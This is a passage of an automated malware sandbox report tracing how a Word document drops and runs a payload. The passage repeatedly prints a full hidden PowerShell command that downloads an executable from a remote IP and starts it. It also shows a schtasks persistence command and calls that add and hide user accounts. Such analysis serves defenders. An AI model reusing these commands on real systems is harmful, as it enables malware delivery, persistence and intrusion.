            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: C:\Users\user\AppData\Roaming\doc.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: scorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: doc[1].exe.0.dr, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: doc.exe.5.dr, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: maBdogbw.exe.9.dr, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 9.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 9.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 12.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 12.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 13.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 13.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Suspicious powershell command line foundShow sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 9_2_02173AEA push edx; retf
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00401190 push eax; ret
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00401190 push eax; ret
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004144B1 push ebp; retf
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00414550 push ebp; retf
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040FA42 LoadLibraryA,GetProcAddress,
            Source: initial sampleStatic PE information: section name: .text entropy: 7.01726471119
            Source: initial sampleStatic PE information: section name: .text entropy: 7.01726471119
            Source: initial sampleStatic PE information: section name: .text entropy: 7.01726471119

            Persistence and Installation Behavior:

            barindex
            Tries to download and execute files (via powershell)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040D418 NetUserAdd,NetLocalGroupAddMembers,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\doc.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\doc.exeFile created: C:\Users\user\AppData\Roaming\maBdogbw.exeJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004027D3 URLDownloadToFileW,ShellExecuteW,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\AppData\Roaming\doc.exeFile opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
            Contains functionality to hide user accountsShow sources
            Source: doc.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
